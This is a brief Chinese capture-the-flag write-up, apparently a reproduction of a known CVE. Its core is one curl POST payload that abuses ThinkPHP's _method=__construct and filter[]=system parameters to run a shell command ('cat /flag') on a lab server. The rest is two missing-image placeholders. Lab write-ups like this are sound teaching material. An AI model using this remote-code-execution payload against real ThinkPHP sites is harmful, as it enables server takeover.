[图片缺失] 原始路径:/home/hack/.config/Typora/typora-user-images/image-20260111102220314.png

1,CVE复现,payload:

1
curl http://121.43.27.97:20105/index.php?s=captcha -X POST -d _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat\ /flag

2.得到flag

[图片缺失] 原始路径:/home/hack/.config/Typora/typora-user-images/image-20260111102336441.png